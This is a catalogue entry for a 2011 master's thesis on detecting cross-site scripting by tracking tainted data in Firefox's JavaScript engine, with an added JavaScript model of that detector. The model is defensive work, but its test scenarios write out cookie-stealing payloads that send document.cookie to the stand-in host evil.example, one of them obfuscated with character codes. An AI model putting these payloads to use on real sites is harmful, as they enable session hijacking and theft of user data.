
Research And Implementation Of Behavior-based Cross-Site Scripting Attack Detection Technique

Posted on: 2011-10-04
Degree: Master
Type: Thesis
Country: China
Candidate: Y Qin
Full Text: PDF
GTID: 2178330332488447
Subject: Computer software and theory
Abstract/Summary:
With the rapid development of computer and network technology, the Internet has brought people into a richer virtual world. Many Web sites make extensive use of client-side script (mostly written in JavaScript) to enhance the user experience. While this technology makes Web pages more interactive, it also introduces security problems such as leakage of user information. Security vendors have developed various tools to protect user information, but most of them are signature-based and cannot respond to new risks in a timely way. To protect Web users' information effectively, this thesis discusses the theory and flow of cross-site scripting (XSS) attacks that use dynamic code obfuscation (DCO), and proposes a behavior-based XSS detection technique.

The main purpose of XSS is to steal the user's sensitive information, and its characteristic behavior is to send that information to a third party without the user's authorization. An XSS attack can therefore be detected by analyzing how the current page accesses sensitive information. The detection technique presented in this thesis protects user information on the client side, in the Web browser. It analyzes the current page's access to sensitive information by tracking the flow of tainted data; if tainted data is about to be transferred to a third party, the current operation is treated as suspicious. For the implementation, the open-source Web browser Mozilla Firefox is used as the experimental platform: its JavaScript engine is analyzed and its processing is extended in each phase. The approach relies mainly on dynamic analysis, with an auxiliary static analysis technique where necessary, to determine how sensitive information is used in the current page.

By handling and judging the analysis result, the suspected XSS attack can be prevented: if sensitive information is about to be transferred to a third party, the user decides whether this should be permitted. Experimental results demonstrate that the behavior-based XSS detection technique proposed in this thesis is feasible in practice.
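The detection idea described in the abstract, as an added example in plain JavaScript (Node.js) that is not the thesis's Firefox/SpiderMonkey implementation: sensitive values read by script carry a taint label, string operations propagate the label, and a sink monitor blocks (or asks the user about) any tainted value headed for an origin other than the page's own. The origins `bank.example`, `evil.example` and `cdn.example`, the cookie value, and the names `TaintedString`, `checkSink` and `runScenarios` are all constructed for this illustration. The obfuscated scenario goes slightly beyond the abstract's wording to show why a data-flow label, unlike a signature, survives dynamic code obfuscation.

```javascript
// Added example: a minimal model of behaviour-based XSS detection by dynamic
// taint tracking. It is NOT the thesis's Firefox/SpiderMonkey code; every name,
// origin and value here is constructed for illustration.

const PAGE_ORIGIN = "https://bank.example"; // assumed origin of the protected page

// A string value carrying the set of sensitive sources it was derived from.
class TaintedString {
  constructor(value, sources) {
    this.value = String(value);
    this.sources = new Set(sources);
  }
  toString() { return this.value; }
}

function isTainted(v) { return v instanceof TaintedString; }

// Simulated page state. A real engine would taint document.cookie, storage,
// form fields and similar at the point where script reads them.
const page = {
  cookie: new TaintedString("SESSION=abc123", ["document.cookie"]),
  title: "Welcome back",
};

// Taint-propagating string operations. The label follows the data, so it
// survives however the attacking script assembles the exfiltration URL
// (dynamic code obfuscation changes the source text, not the data flow).
function concat(...parts) {
  const sources = [];
  let out = "";
  for (const p of parts) {
    if (isTainted(p)) { sources.push(...p.sources); out += p.value; }
    else { out += String(p); }
  }
  return sources.length ? new TaintedString(out, sources) : out;
}

function encode(v) {
  return isTainted(v)
    ? new TaintedString(encodeURIComponent(v.value), v.sources)
    : encodeURIComponent(String(v));
}

// "Third party" = any origin (scheme, host, port) other than the page's own.
function isThirdParty(url, pageOrigin = PAGE_ORIGIN) {
  try {
    return new URL(url).origin !== new URL(pageOrigin).origin;
  } catch {
    return true; // unparsable destination: treat as suspicious
  }
}

// Sink monitor, called where the engine would hand a value to the network
// (img.src, XMLHttpRequest, location, form.action, ...). The thesis lets the
// user decide; `askUser` stands in for that prompt and denies by default.
function checkSink(sink, urlValue, askUser = () => false) {
  const url = String(urlValue);
  const record = { sink, url, verdict: "allow", reason: "no sensitive data" };
  if (!isTainted(urlValue)) return record;
  if (!isThirdParty(url)) {
    return { ...record, reason: "sensitive data, but first-party destination" };
  }
  const sources = [...urlValue.sources].join(", ");
  const permitted = askUser(record);
  return {
    ...record,
    verdict: permitted ? "allow" : "block",
    reason: `${sources} flowing to third party ${new URL(url).origin}`,
  };
}

// Four scripts the page might run, returned as decision records.
function runScenarios() {
  // 1. Classic injected payload: new Image().src = "https://evil.example/c?" + document.cookie
  const plain = checkSink("img.src", concat("https://evil.example/c?", page.cookie));

  // 2. Same theft under dynamic code obfuscation: host built from char codes,
  //    cookie URL-encoded. A signature on "evil.example" or "document.cookie"
  //    never sees either string; the taint label is still attached.
  const host = String.fromCharCode(101, 118, 105, 108) + "." + "exam" + "ple"; // "evil.example"
  const obfuscated = checkSink("xhr.open", concat("https://", host, "/c?d=", encode(page.cookie)));

  // 3. Legitimate first-party use of the cookie value.
  const sameOrigin = checkSink("xhr.open", concat(PAGE_ORIGIN, "/api/session?c=", page.cookie));

  // 4. Third-party request carrying nothing sensitive (page title only).
  const untainted = checkSink("img.src", concat("https://cdn.example/t?t=", encode(page.title)));

  return { plain, obfuscated, sameOrigin, untainted };
}

for (const [name, r] of Object.entries(runScenarios())) {
  console.log(`${name.padEnd(11)} ${r.verdict.padEnd(5)} ${r.sink} -> ${r.url}  (${r.reason})`);
}
```

Running it prints `block` for the plain and obfuscated exfiltration and `allow` for the two benign requests. The model is deliberately narrow: a real engine-level implementation has to propagate labels through every string and DOM operation (including `eval` of tainted text, which is where the thesis's auxiliary static analysis would come in), and the origin comparison must cover every network sink, not only the two named here.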
Keywords/Search Tags: XSS, DCO, JavaScript Engine, Browser Security